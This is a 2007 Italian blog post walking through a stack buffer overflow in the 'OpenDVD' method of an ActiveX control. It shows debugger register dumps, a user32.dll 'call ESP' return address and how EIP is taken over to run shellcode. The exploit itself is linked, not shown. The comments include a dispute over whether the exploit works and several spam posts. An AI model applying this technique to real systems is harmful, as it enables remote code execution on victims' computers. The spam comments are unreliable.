2007/05/05

MoAxB #05: East Wind Software (advdaudio.ocx v. 1.5.1.1) 'OpenDVD' method Stack Buffer Overflow

Bene, volevo lasciare i bug più interessanti per la seconda metà del mese ma, siccome sta nascendo un putiferio (sul mio modo di parlare in inglese e sulle mie capacità tecniche), posto un exploit che sfrutta uno stack overflow causato dall'ocx per eseguire codice arbitrario su un pc.

Dimostrazione online

Formato txt

Analizziamo meglio lo scenario: al momento del crash la situazione dei registri è la seguente:

14:51:52.171 pid=0A90 tid=0E40 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [616165E5])
----------------------------------------------------------------
EAX=61616161: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=0174EDE0: 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42
ECX=000035D1: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=01750110: 6F 00 F2 00 ED F2 F2 00-ED F2 F2 00 ED F2 F2 00
ESP=0174EA40: 10 EB FF 02 1C EB 74 01-61 1E 94 7C 1C EB 74 01
EBP=0174EDB8: 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42
ESI=00000008: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=02FE056E: 20 20 20 20 3C 2F 70 3E-0D 0A 20 20 20 20 20 20
EIP=03D2187D: 8B 90 84 04 00 00 8D 88-7C 04 00 00 85 D2 7E 09
--> MOV EDX,[EAX+00000484]
----------------------------------------------------------------

14:51:52.171 pid=0A90 tid=0E40 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [42424242])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=0174E670: BF 37 91 7C 58 E7 74 01-AC ED 74 01 74 E7 74 01
EBP=0174E690: 40 E7 74 01 8B 37 91 7C-58 E7 74 01 AC ED 74 01
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
----------------------------------------------------------------

Come potete notare, l'errore avviene nel momento in cui si cerca di leggere il contenuto di EAX mentre, nel passo successivo, vediamo EIP sovrascritto con dati arbitrari.
Bene, la prima cosa da fare è passare ad EAX un "readable" address, così da superare la prima limitazione.
Passiamo allora 0x77D7AAEB call ESP (from user32.dll) e vediamo cosa succede ai registri:

15:03:32.855 pid=0A98 tid=06E0 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [63636363])
----------------------------------------------------------------
EAX=73E186D4: 00 00 00 00 84 6A DF 73-00 00 00 00 2E 3F 41 56
EBX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7608F260: 10 05 46 03 FF FF FF FF-00 00 00 00 00 00 00 00
ESP=0174EDEC: 90 EB 03 59 EB 05 E8 F8-FF FF FF 4F 49 49 49 49
EBP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
----------------------------------------------------------------

15:03:32.855 pid=0A98 tid=06E0 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [63636363])
----------------------------------------------------------------
EAX=73E186D4: 00 00 00 00 84 6A DF 73-00 00 00 00 2E 3F 41 56
EBX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7608F260: 10 05 46 03 FF FF FF FF-00 00 00 00 00 00 00 00
ESP=0174EDEC: 90 EB 03 59 EB 05 E8 F8-FF FF FF 4F 49 49 49 49
EBP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
----------------------------------------------------------------

Bingo! Ora controlliamo EIP e abbiamo in ESP il contenuto della shellcode, il resto è storia...

That's all folks!

10 comments:

Dave said...

Ive been looking at your voulns and most of them dont work why are u publishing non working exploits.
????????
I mean your remote exploits dont even work also you ripped the name from the Month of the browser bugs All your dos pocs are the same..Also any one can download and run a fuzzer good luck just thought i would bring it to your attention you need to learn to code more test your remote poc and see for your self..You haven't got a clue what you are doing and its obvious.

shinnai said...

mmm... I suppose that, before say that the exploit doesn't work, you search for the corect call ESP from user32.dll (with findjmp, for example), right?
And I suppose you try it on Windows XP Professional SP2 full patched, right?
I think You haven't got a clue what you are saying and its obvious.

Anonymous said...

酒店經紀PRETTY GIRL 台北酒店經紀人 ,禮服店 酒店兼差PRETTY GIRL酒店公關 酒店小姐 彩色爆米花酒店兼職,酒店經紀, 酒店上班,酒店工作 PRETTY GIRL酒店喝酒酒店上班 彩色爆米花台北酒店酒店小姐 PRETTY GIRL酒店上班酒店打工PRETTY GIRL酒店打工酒店經紀 彩色爆米花

Anonymous said...

Your blog is wonderful, I like it very much, thank you!
By the way, do you like polo shirts, which are very chic, especially the polo t shirts, I love them very much. I also like playing tennis rackets, it can keep healthy, what do you like to do?
We are the outlet of polo t shirts women, polo t shirts on sale, polo t shirts for women, polo shirts on sale, these products are best-seller in our store online.besides we also sell polo shirts men, men's polo shirt, men polo shirt, mens polo shirts, mens polo shirt and cheap polo shirts, discount polo shirts, men's polo shirts, women's polo shirts We are also the outlet of cheap tennis racket, discount tennis racket, and the main product is prince tennis racquet, head tennis rackets, wilson tennis racket, babolat tennis racquet.You are warmly welcomed to my store online!

Anonymous said...

徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信徵信社徵信

Unknown said...

Watch company replica IWC Schaffhausen celebrates the man known as Saint-Ex with a special edition.
watches replica
replica watches
replica watch
Fake watches
Men’s watcheshes
IWC
replica IWC
IWC replica
replica IWC watch
replica IWC watches
IWC Aquatimer
iwc big pilot
IWC Da Vinci
IWC Vintage collection
IWC Portofino
IWC Portuguese
replica IWC Aquatimer
replica IWC Da Vinci
replica IWC Portofino

MH said...

I really liked this part of the article, with a nice and interesting topics have helped a lot of people who do not challenge things people should know... you need more publicize this so many people who know about it are rare for people to know this, Success for you...

Unknown said...

Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download . Download .

Unknown said...

Hi,
That’s an amazing post. I’m sure these techniques will work for beginners. thanks for sharing great admin.
Thanks
for Sharing

atifabushra said...

software


dance video

Movies

Songs

Dramas